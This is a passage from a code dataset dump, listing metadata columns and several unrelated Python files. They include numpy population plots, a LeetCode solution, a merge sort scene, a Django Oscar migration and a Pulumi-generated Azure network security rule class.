blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 3
616
| content_id
stringlengths 40
40
| detected_licenses
sequencelengths 0
112
| license_type
stringclasses 2
values | repo_name
stringlengths 5
115
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 777
values | visit_date
timestamp[us]date 2015-08-06 10:31:46
2023-09-06 10:44:38
| revision_date
timestamp[us]date 1970-01-01 02:38:32
2037-05-03 13:00:00
| committer_date
timestamp[us]date 1970-01-01 02:38:32
2023-09-06 01:08:06
| github_id
int64 4.92k
681M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 22
values | gha_event_created_at
timestamp[us]date 2012-06-04 01:52:49
2023-09-14 21:59:50
⌀ | gha_created_at
timestamp[us]date 2008-05-22 07:58:19
2023-08-21 12:35:19
⌀ | gha_language
stringclasses 149
values | src_encoding
stringclasses 26
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 3
10.2M
| extension
stringclasses 188
values | content
stringlengths 3
10.2M
| authors
sequencelengths 1
1
| author_id
stringlengths 1
132
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
10a57f45023bd99e590058c70fed50cd5dbdabde | d6d20681f41102df3feb2b438ef80569bd73730f | /Uge4-numpy/.history/exercises_20200218211509.py | 721a35c816eab099a775532e7a3d12f563a27947 | [] | no_license | MukHansen/pythonAfleveringer | d0ad2629da5ba2b6011c9e92212949e385443789 | 4107c3c378f757733961812dd124efc99623ff2e | refs/heads/master | 2020-12-22T13:27:19.135138 | 2020-05-22T11:35:52 | 2020-05-22T11:35:52 | 236,796,591 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,051 | py | import numpy as np
import matplotlib.pyplot as plt
from collections import OrderedDict
filename = './befkbhalderstatkode.csv'
data = np.genfromtxt(filename, delimiter=',', dtype=np.uint, skip_header=1)
neighb = {1: 'Indre By', 2: 'Østerbro', 3: 'Nørrebro', 4: 'Vesterbro/Kgs. Enghave',
5: 'Valby', 6: 'Vanløse', 7: 'Brønshøj-Husum', 8: 'Bispebjerg', 9: 'Amager Øst',
10: 'Amager Vest', 99: 'Udenfor'}
years = {1992: 0, 1993: 0, 1994: 0, 1995: 0, 1996: 0, 1997: 0, 1998: 0, 1999: 0, 2000: 0, 2001: 0, 2002: 0,
2003: 0, 2004: 0, 2005: 0, 2006: 0, 2007: 0, 2008: 0, 2009: 0, 2010: 0, 2011: 0, 2012: 0, 2013: 0,
2014: 0, 2015: 0}
east = {}
west = {}
specificHoods = {2: 'Østerbro', 4: 'Vesterbro/Kgs.'} #, 4: 'Vesterbro/Kgs.'
nordicCountryCodes = {5104: 'Finland', 5106: 'Island', 5110: 'Norge', 5120: 'Sverige'}
def getPopPerHood(hood):
deezMask = (data[:,0] == 2015) & (data[:,1] == hood)
return np.sum(data[deezMask][:,4])
def getPopPerSpecificHood(year, hood):
deezMask = (data[:,0] == year) & (data[:,1] == hood)
# print((data[deezMask][:,(0,4)]))
# return (data[deezMask][:,(0,4)])
return np.sum(data[deezMask][:,4])
def getOldPeople():
deezMask = (data[:,0] == 2015) & (data[:,2] <= 65)
return np.sum(data[deezMask][:,4])
def getOldNordicPeople(countrycode):
deezMask = (data[:,0] == 2015) & (data[:,2] <= 65) & (data[:,3] == countrycode)
return np.sum(data[deezMask][:,4])
def getSumOfOldNordicPeople():
lst = {}
for key, value in nordicCountryCodes.items():
# print(value, getOldNordicPeople(key))
lst.update({value: getOldNordicPeople(key)})
return lst
def getSumPerHood():
lst = {}
for key, value in neighb.items():
# print(value, getPopPerHood(key))
lst.update({value: getPopPerHood(key)})
return lst
def getSumPerSpecificHoods():
lst = []
for ykey, yvalue in years.items():
for hkey, hvalue in specificHoods.items():
# lst[ykey] = getPopPerSpecificHood(ykey, hkey)
if(hkey == 2):
east[ykey] = getPopPerSpecificHood(ykey, hkey)
else:
west[ykey] = getPopPerSpecificHood(ykey, hkey)
# print(value, getPopPerSpecificHood(key))
# lst[key] = getPopPerSpecificHood(key)
# lst.append({value: getPopPerSpecificHood(key)})
# d['a'] = 100 # existing key, so overwrite
# d['c'] = 3 # new key, so add
lst.append(east)
lst.append(west)
return lst
def displayPlotOfHoodsPop():
lst = getSumPerHood()
hoodsSorted = OrderedDict(sorted(lst.items(), key=lambda x: x[1]))
cityAreas = []
sumOfPeople = []
for key, value in hoodsSorted.items():
cityAreas.append(key)
sumOfPeople.append(value)
plt.bar(cityAreas, sumOfPeople, width=0.5, linewidth=0, align='center')
title = 'Population in various areas in cph'
plt.title(title, fontsize=12)
plt.xticks(cityAreas, rotation=65)
plt.tick_params(axis='both', labelsize=8)
plt.show()
def displayPopulationOverTheYears():
getSumPerSpecificHoods() # Sørger for data til listerne east og west
yearsToDisp = []
eastpopulation = []
westpopulation = []
for key, value in years.items():
yearsToDisp.append(key)
for key, value in east.items():
eastpopulation.append(value)
for key, value in west.items():
westpopulation.append(value)
plt.figure()
plt.plot(list(range(1992,2015)), eastpopulation, linewidth=5)
plt.plot(list(range(1992,2015)), westpopulation, linewidth=5)
plt.title("Population over the years", fontsize=24)
plt.xlabel("Year", fontsize=14)
plt.tick_params(axis='both', labelsize=14)
plt.show()
# print(getSumPerHood())
# displayPlotOfHoodsPop()
# print('Number of people above the age of 65 --',getOldPeople())
# print(getSumOfOldNordicPeople())
# displayPopulationOverTheYears()
# print(getSumPerSpecificHoods())
print(displayPopulationOverTheYears()) | [
"[email protected]"
] | |
ab5f5aaf705c61d6d3a52fe6a016b2045c35009c | 099256b28df65fb7c90c077b060dca16b8655235 | /math/0x00-linear_algebra/100-slice_like_a_ninja.py | e1589c7bf3ddf30431df2717bebb8ee713b0f971 | [] | no_license | Immaannn2222/holbertonschool-machine_learning | 1cebb9a889b363669bed7645d102dc56ab943c08 | 80bf8d3354702f7fb9f79bbb5ed7e00fc19f788d | refs/heads/master | 2023-08-01T05:35:00.180472 | 2021-09-22T20:28:17 | 2021-09-22T20:28:17 | 317,624,526 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 321 | py | #!/usr/bin/env python3
""" advanced task """
def np_slice(matrix, axes={}):
""" slices a matrix along specific axes """
new = []
for x in range(len(matrix.shape)):
if x in axes:
new.append(slice(*axes[x]))
else:
new.append(slice(None))
return(matrix[tuple(new)])
| [
"[email protected]"
] | |
bd4930323e802b96035529be61f106d64f693e9e | b92e187f60b1bc8bd74eaa0ffc6e1ac50911a08e | /django/dataset/detailsAPI/admin.py | 32e817d5754f1a5fc95bf212913daa6c3b9565d0 | [] | no_license | code-xD/codefundo-hack | ad5b149726188bd15be7476f14adf90f08ff33d7 | f4883015d2d5f4b1b6a493ffa58249c46fc544a1 | refs/heads/master | 2022-12-10T10:41:30.388439 | 2019-08-20T12:06:19 | 2019-08-20T12:06:19 | 195,676,080 | 0 | 1 | null | 2022-05-25T03:12:11 | 2019-07-07T16:56:28 | CSS | UTF-8 | Python | false | false | 127 | py | from django.contrib import admin
from .models import VoterDetail
# Register your models here.
admin.site.register(VoterDetail)
| [
"[email protected]"
] | |
1f2e6da575054c5f9539d0a9dfc2ceecc2f7f8ae | bfe6c95fa8a2aae3c3998bd59555583fed72900a | /findMaxValueOfEquation.py | 44e49a562e323596044cf7ecbec22a3e97ebfb8e | [] | no_license | zzz136454872/leetcode | f9534016388a1ba010599f4771c08a55748694b2 | b5ea6c21bff317884bdb3d7e873aa159b8c30215 | refs/heads/master | 2023-09-01T17:26:57.624117 | 2023-08-29T03:18:56 | 2023-08-29T03:18:56 | 240,464,565 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 933 | py | from typing import List
class Solution:
def findMaxValueOfEquation(self, points: List[List[int]], k: int) -> int:
stack = []
j = 0
out = -12345678901234
for i in range(len(points) - 1):
while j < len(points) and points[j][0] - points[i][0] <= k:
tmp = points[j][0] + points[j][1]
while len(stack) > 0 and stack[-1] < tmp:
stack.pop()
stack.append(tmp)
j += 1
if points[i][1] + points[i][0] == stack[0]:
stack.pop(0)
if len(stack) > 0:
out = max(out, stack[0] + points[i][1] - points[i][0])
# print(i,j,stack,out)
return out
points = [[1, 3], [2, 0], [5, 10], [6, -10]]
k = 1
points = [[0, 0], [3, 0], [9, 2]]
k = 3
points = [[-19, 9], [-15, -19], [-5, -8]]
k = 10
print(Solution().findMaxValueOfEquation(points, k))
| [
"[email protected]"
] | |
de469789154588023215e0a3a02a630ce008e14b | 22029865c571f7f5ba18de77f8eea6b3e77b3bbb | /phiface/context.py | b995768e6a32eadfac7ff45dc5d059a29a2a5afd | [
"BSD-2-Clause"
] | permissive | mikejs/phiface | cfc100421afa4bef9c4afa6eb4ac8f7ae8d74163 | 2a2a5f8e1e555784cb2f2a27cecdf9c25a1c6044 | refs/heads/master | 2021-01-18T10:31:48.989712 | 2010-04-21T04:13:45 | 2010-04-21T04:13:45 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,456 | py | import cairo
from shapely.geometry import *
PDFOutput = True
# flatten from:
# http://rightfootin.blogspot.com/2006/09/more-on-python-flatten.html
def flatten(l, ltypes=(list, tuple)):
ltype = type(l)
l = list(l)
i = 0
while i < len(l):
while isinstance(l[i], ltypes):
if not l[i]:
l.pop(i)
i -= 1
break
else:
l[i:i + 1] = l[i]
i += 1
return ltype(l)
class Context(object):
def __init__(self):
super(Context, self).__init__()
self.width = 1200
self.height = 800
if PDFOutput:
self.surface = cairo.PDFSurface("output.pdf",
self.width, self.height)
else:
self.surface = cairo.ImageSurface(cairo.FORMAT_ARGB32,
self.width, self.height)
self.ctx = cairo.Context(self.surface)
self.ctx.set_source_rgba(1.0, 1.0, 1.0, 1.0)
self.ctx.rectangle(0, 0, self.width, self.height)
self.ctx.fill()
def _drawCoords(self, coords):
self.ctx.move_to(*coords[0])
for (x, y) in coords:
self.ctx.line_to(x, y)
self.ctx.close_path()
def _drawPolygon(self, poly):
self._drawCoords(poly.exterior.coords)
for hole in poly.interiors:
self._drawCoords(hole.coords)
self.ctx.set_source_rgba(0.0, 0.0, 0.0, 1.0)
self.ctx.fill()
def draw(self, polygons):
poly = mergeSubPolys(polygons)
if type(poly) is MultiPolygon:
for subPoly in poly.geoms:
self._drawPolygon(subPoly)
else:
self._drawPolygon(poly)
def write(self):
if not PDFOutput:
self.surface.write_to_png("output.png")
def mergeSubPolys(polygons):
def _flattenPolys(polys):
polyList = []
if type(polys) is Polygon or type(polys) is MultiPolygon:
return polys
for p in polys:
if not p:
continue
if type(p) is list:
polyList += _flattenPolys(p)
elif type(p) is Polygon or type(p) is MultiPolygon:
polyList.append(p)
else:
polyList += flatten([_flattenPolys(p.getPolygon())])
return polyList
return reduce(lambda x, y: x.union(y), _flattenPolys(polygons)) | [
"[email protected]"
] | |
48c3f72ee6abaa8cbb830bcb382ccfefdb237956 | c36fc8f9bbc3e5891474bbbf17de09711cc9d0af | /alvi/client/scenes/merge_sort.py | 38997dcfec013867d20041a4f1f348d5d766e843 | [
"MIT"
] | permissive | alviproject/alvi | f527043c1ecaf4557188c312db7e8a8065ec054d | ec77919a546c11c46b178a21236792f8b0d95cbd | refs/heads/master | 2021-01-19T01:45:51.157037 | 2016-06-17T19:44:09 | 2016-06-17T19:44:09 | 13,392,604 | 10 | 5 | null | 2014-03-02T14:05:54 | 2013-10-07T18:54:09 | JavaScript | UTF-8 | Python | false | false | 1,116 | py | from alvi.client.scenes.sort import Sort
class MergeSort(Sort):
def merge(self, array, left, mid, right):
temp = []
for i in range(left, right):
temp.append(array[i])
i = 0
j = right - mid
k = 0
while k < len(temp):
if i >= mid - left:
array[k+left] = temp[j]
j += 1
elif j >= len(temp):
array[k+left] = temp[i]
i += 1
elif temp[i] < temp[j]:
array[k+left] = temp[i]
i += 1
else:
array[k+left] = temp[j]
j += 1
k += 1
def _sort(self, array, left, right):
if right - left <= 1:
return
mid = (left+right) // 2
self._sort(array, left, mid)
self._sort(array, mid, right)
self.merge(array, left, mid, right)
if (right-left) > array.size() // 50:
array.sync()
def sort(self, **kwargs):
array = kwargs['container']
self._sort(array, 0, array.size())
array.sync() | [
"[email protected]"
] | |
74abd35dc7be54c8af5452993644678fe289aae8 | 8fc9520d7224e6179f63f19e668b4b3b6a7d76c5 | /apps/catalogue/migrations/0006_auto__add_field_product_is_discountable.py | 35581eb19b16340bf4e806e466cfd03e6678e23f | [] | no_license | quantm/custom_django_oscar | 352ef2fd95e7da932958d4aa80d77dff5b6c1e70 | 9205807030ab360884283810e94177440c228a23 | refs/heads/master | 2016-08-09T12:23:39.413677 | 2016-02-08T22:16:53 | 2016-02-08T22:16:53 | 51,326,524 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 13,063 | py | # encoding: utf-8
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'Product.is_discountable'
db.add_column('catalogue_product', 'is_discountable', self.gf('django.db.models.fields.BooleanField')(default=True), keep_default=False)
def backwards(self, orm):
# Deleting field 'Product.is_discountable'
db.delete_column('catalogue_product', 'is_discountable')
models = {
'catalogue.attributeentity': {
'Meta': {'object_name': 'AttributeEntity'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'slug': ('django.db.models.fields.SlugField', [], {'db_index': 'True', 'max_length': '255', 'blank': 'True'}),
'type': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'entities'", 'to': "orm['catalogue.AttributeEntityType']"})
},
'catalogue.attributeentitytype': {
'Meta': {'object_name': 'AttributeEntityType'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'slug': ('django.db.models.fields.SlugField', [], {'db_index': 'True', 'max_length': '255', 'blank': 'True'})
},
'catalogue.attributeoption': {
'Meta': {'object_name': 'AttributeOption'},
'group': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'options'", 'to': "orm['catalogue.AttributeOptionGroup']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'option': ('django.db.models.fields.CharField', [], {'max_length': '255'})
},
'catalogue.attributeoptiongroup': {
'Meta': {'object_name': 'AttributeOptionGroup'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128'})
},
'catalogue.category': {
'Meta': {'ordering': "['full_name']", 'object_name': 'Category'},
'depth': ('django.db.models.fields.PositiveIntegerField', [], {}),
'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'full_name': ('django.db.models.fields.CharField', [], {'max_length': '255', 'db_index': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'image': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255', 'db_index': 'True'}),
'numchild': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'path': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '255', 'db_index': 'True'})
},
'catalogue.contributor': {
'Meta': {'object_name': 'Contributor'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '255', 'db_index': 'True'})
},
'catalogue.contributorrole': {
'Meta': {'object_name': 'ContributorRole'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'}),
'name_plural': ('django.db.models.fields.CharField', [], {'max_length': '50'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '50', 'db_index': 'True'})
},
'catalogue.option': {
'Meta': {'object_name': 'Option'},
'code': ('django.db.models.fields.SlugField', [], {'max_length': '128', 'db_index': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'type': ('django.db.models.fields.CharField', [], {'default': "'Required'", 'max_length': '128'})
},
'catalogue.product': {
'Meta': {'ordering': "['-date_created']", 'object_name': 'Product'},
'attributes': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['catalogue.ProductAttribute']", 'through': "orm['catalogue.ProductAttributeValue']", 'symmetrical': 'False'}),
'categories': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['catalogue.Category']", 'through': "orm['catalogue.ProductCategory']", 'symmetrical': 'False'}),
'date_created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'date_updated': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'db_index': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_discountable': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'parent': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'variants'", 'null': 'True', 'to': "orm['catalogue.Product']"}),
'product_class': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalogue.ProductClass']", 'null': 'True'}),
'product_options': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['catalogue.Option']", 'symmetrical': 'False', 'blank': 'True'}),
'recommended_products': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['catalogue.Product']", 'symmetrical': 'False', 'through': "orm['catalogue.ProductRecommendation']", 'blank': 'True'}),
'related_products': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'relations'", 'blank': 'True', 'to': "orm['catalogue.Product']"}),
'score': ('django.db.models.fields.FloatField', [], {'default': '0.0', 'db_index': 'True'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '255', 'db_index': 'True'}),
'status': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '128', 'null': 'True', 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'upc': ('django.db.models.fields.CharField', [], {'max_length': '64', 'unique': 'True', 'null': 'True', 'blank': 'True'})
},
'catalogue.productattribute': {
'Meta': {'ordering': "['code']", 'object_name': 'ProductAttribute'},
'code': ('django.db.models.fields.SlugField', [], {'max_length': '128', 'db_index': 'True'}),
'entity_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalogue.AttributeEntityType']", 'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'option_group': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalogue.AttributeOptionGroup']", 'null': 'True', 'blank': 'True'}),
'product_class': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'attributes'", 'null': 'True', 'to': "orm['catalogue.ProductClass']"}),
'required': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'type': ('django.db.models.fields.CharField', [], {'default': "'text'", 'max_length': '20'})
},
'catalogue.productattributevalue': {
'Meta': {'object_name': 'ProductAttributeValue'},
'attribute': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalogue.ProductAttribute']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'product': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'attribute_values'", 'to': "orm['catalogue.Product']"}),
'value_boolean': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'value_date': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'value_entity': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalogue.AttributeEntity']", 'null': 'True', 'blank': 'True'}),
'value_float': ('django.db.models.fields.FloatField', [], {'null': 'True', 'blank': 'True'}),
'value_integer': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'value_option': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalogue.AttributeOption']", 'null': 'True', 'blank': 'True'}),
'value_richtext': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'value_text': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'})
},
'catalogue.productcategory': {
'Meta': {'ordering': "['-is_canonical']", 'object_name': 'ProductCategory'},
'category': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalogue.Category']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_canonical': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'db_index': 'True'}),
'product': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalogue.Product']"})
},
'catalogue.productclass': {
'Meta': {'ordering': "['name']", 'object_name': 'ProductClass'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'options': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['catalogue.Option']", 'symmetrical': 'False', 'blank': 'True'}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '128', 'db_index': 'True'})
},
'catalogue.productcontributor': {
'Meta': {'object_name': 'ProductContributor'},
'contributor': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalogue.Contributor']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'product': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalogue.Product']"}),
'role': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalogue.ContributorRole']", 'null': 'True', 'blank': 'True'})
},
'catalogue.productimage': {
'Meta': {'ordering': "['display_order']", 'unique_together': "(('product', 'display_order'),)", 'object_name': 'ProductImage'},
'caption': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'date_created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'display_order': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'original': ('django.db.models.fields.files.ImageField', [], {'max_length': '100'}),
'product': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'images'", 'to': "orm['catalogue.Product']"})
},
'catalogue.productrecommendation': {
'Meta': {'object_name': 'ProductRecommendation'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'primary': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'primary_recommendations'", 'to': "orm['catalogue.Product']"}),
'ranking': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '0'}),
'recommendation': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalogue.Product']"})
}
}
complete_apps = ['catalogue']
| [
"[email protected]"
] | |
311eac1a6c280507906e8cf7a87844607ff9fddf | 04c7295ce65a623dc62454aa46ae4ae4ce51ca36 | /Lecture/Lecture_3/three_special_perfect_squares_v1_v3.6.py | 8f5b2aa24f0c1e10d1bad0df764379d50125baab | [] | no_license | hty-unsw/COMP9021-Python | 38373378162a314a82bf14453d026e641963e1b9 | 97be6dfa730247b59e608ec6d464ac16b4cf1968 | refs/heads/master | 2020-07-03T00:51:23.540099 | 2018-10-30T14:23:15 | 2018-10-30T14:23:15 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,398 | py | # Describes all sets of positive integers {x, y, z} such that
# x, y and z have no occurrence of 0,
# every nonzero digit occurs exactly once in one of x, y or z,
# and x, y and z are perfect squares.
#
# Written by Eric Martin for COMP9021
from math import sqrt
def digits_if_ok(number, digits_seen_so_far):
digits_seen_now = set(digits_seen_so_far)
while number:
# Extract rightmost digit from number.
digit = number % 10
if digit in digits_seen_now:
return
digits_seen_now.add(digit)
# Get rid of rightmost digit of number.
number //= 10
return digits_seen_now
# If it was a perfect square, max_square would, associated with 1 and 4,
# be the largest member of a possible solution.
max_square = 9876532
nb_of_solutions = 0
upper_bound = round(sqrt(max_square)) + 1
set_of_all_digits = set(range(10))
for x in range(1, upper_bound):
x_square = x * x
# digits_in_x_square_and_0 is not None
# iff all digits in x_square are distinct and not equal to 0.
digits_in_x_square_and_0 = digits_if_ok(x_square, {0})
if not digits_in_x_square_and_0:
continue
for y in range(x + 1, upper_bound):
y_square = y * y
# digits_in_x_square_and_y_square_and_0 is not None
# iff all digits in y_square are distinct, distinct to 0,
# and distinct to all digits in x_square.
digits_in_x_square_and_y_square_and_0 =\
digits_if_ok(y_square, digits_in_x_square_and_0)
if not digits_in_x_square_and_y_square_and_0:
continue
for z in range(y + 1, upper_bound):
z_square = z * z
# digits_in_x_square_and_y_square_and_z_square_and_0 is not None
# iff all digits in z_square are distinct, distinct to 0,
# and distinct to all digits in x_square and y_square.
digits_in_x_square_and_y_square_and_z_square_and_0 =\
digits_if_ok(z_square, digits_in_x_square_and_y_square_and_0)
if not digits_in_x_square_and_y_square_and_z_square_and_0:
continue
if digits_in_x_square_and_y_square_and_z_square_and_0 != set_of_all_digits:
continue
print(f'{x_square:7d} {y_square:7d} {z_square:7d}')
nb_of_solutions += 1
print(f'\nAltogether, {nb_of_solutions} solutions have been found.')
| [
"[email protected]"
] | |
bd2567eb7e348826d18e2bd1cca6275f0f0602e8 | 9cd180fc7594eb018c41f0bf0b54548741fd33ba | /sdk/python/pulumi_azure_nextgen/network/v20180201/security_rule.py | fa3d42ca6372ba696deef9c4135a4eef42ff5c3b | [
"Apache-2.0",
"BSD-3-Clause"
] | permissive | MisinformedDNA/pulumi-azure-nextgen | c71971359450d03f13a53645171f621e200fe82d | f0022686b655c2b0744a9f47915aadaa183eed3b | refs/heads/master | 2022-12-17T22:27:37.916546 | 2020-09-28T16:03:59 | 2020-09-28T16:03:59 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 18,117 | py | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union
from ... import _utilities, _tables
from . import outputs
from ._inputs import *
__all__ = ['SecurityRule']
class SecurityRule(pulumi.CustomResource):
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
access: Optional[pulumi.Input[str]] = None,
description: Optional[pulumi.Input[str]] = None,
destination_address_prefix: Optional[pulumi.Input[str]] = None,
destination_address_prefixes: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
destination_application_security_groups: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ApplicationSecurityGroupArgs']]]]] = None,
destination_port_range: Optional[pulumi.Input[str]] = None,
destination_port_ranges: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
direction: Optional[pulumi.Input[str]] = None,
etag: Optional[pulumi.Input[str]] = None,
id: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
network_security_group_name: Optional[pulumi.Input[str]] = None,
priority: Optional[pulumi.Input[int]] = None,
protocol: Optional[pulumi.Input[str]] = None,
provisioning_state: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
security_rule_name: Optional[pulumi.Input[str]] = None,
source_address_prefix: Optional[pulumi.Input[str]] = None,
source_address_prefixes: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
source_application_security_groups: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ApplicationSecurityGroupArgs']]]]] = None,
source_port_range: Optional[pulumi.Input[str]] = None,
source_port_ranges: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
__props__=None,
__name__=None,
__opts__=None):
"""
Network security rule.
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] access: The network traffic is allowed or denied. Possible values are: 'Allow' and 'Deny'.
:param pulumi.Input[str] description: A description for this rule. Restricted to 140 chars.
:param pulumi.Input[str] destination_address_prefix: The destination address prefix. CIDR or destination IP range. Asterisk '*' can also be used to match all source IPs. Default tags such as 'VirtualNetwork', 'AzureLoadBalancer' and 'Internet' can also be used.
:param pulumi.Input[Sequence[pulumi.Input[str]]] destination_address_prefixes: The destination address prefixes. CIDR or destination IP ranges.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ApplicationSecurityGroupArgs']]]] destination_application_security_groups: The application security group specified as destination.
:param pulumi.Input[str] destination_port_range: The destination port or range. Integer or range between 0 and 65535. Asterisk '*' can also be used to match all ports.
:param pulumi.Input[Sequence[pulumi.Input[str]]] destination_port_ranges: The destination port ranges.
:param pulumi.Input[str] direction: The direction of the rule. The direction specifies if rule will be evaluated on incoming or outgoing traffic. Possible values are: 'Inbound' and 'Outbound'.
:param pulumi.Input[str] etag: A unique read-only string that changes whenever the resource is updated.
:param pulumi.Input[str] id: Resource ID.
:param pulumi.Input[str] name: The name of the resource that is unique within a resource group. This name can be used to access the resource.
:param pulumi.Input[str] network_security_group_name: The name of the network security group.
:param pulumi.Input[int] priority: The priority of the rule. The value can be between 100 and 4096. The priority number must be unique for each rule in the collection. The lower the priority number, the higher the priority of the rule.
:param pulumi.Input[str] protocol: Network protocol this rule applies to. Possible values are 'Tcp', 'Udp', and '*'.
:param pulumi.Input[str] provisioning_state: The provisioning state of the public IP resource. Possible values are: 'Updating', 'Deleting', and 'Failed'.
:param pulumi.Input[str] resource_group_name: The name of the resource group.
:param pulumi.Input[str] security_rule_name: The name of the security rule.
